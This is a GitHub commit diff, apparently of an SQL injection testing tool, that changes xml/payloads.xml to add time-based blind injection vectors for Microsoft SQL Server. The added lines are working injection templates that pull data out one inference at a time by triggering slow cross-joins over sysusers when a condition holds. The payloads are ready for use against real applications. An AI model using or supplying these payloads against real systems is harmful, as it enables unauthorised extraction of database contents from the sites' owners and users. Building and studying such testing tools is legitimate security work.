Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 36a7fca

Browse files
committed
added time-based payload vector for MSSQL
1 parent 485981c commit 36a7fca

1 file changed

Lines changed: 4 additions & 2 deletions

File tree

xml/payloads.xml

Lines changed: 4 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1523,8 +1523,9 @@ Formats:
15231523
<risk>1</risk>
15241524
<clause>1,2,3</clause>
15251525
<where>1</where>
1526+
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)</vector>
15261527
<request>
1527-
<payload>AND (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>0</payload>
1528+
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)</payload>
15281529
</request>
15291530
<response>
15301531
<time>[DELAYED]</time>
@@ -1681,8 +1682,9 @@ Formats:
16811682
<risk>3</risk>
16821683
<clause>1,2,3</clause>
16831684
<where>2</where>
1685+
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)</vector>
16841686
<request>
1685-
<payload>OR (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>0</payload>
1687+
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)</payload>
16861688
</request>
16871689
<response>
16881690
<time>[DELAYED]</time>

0 commit comments

Comments
 (0)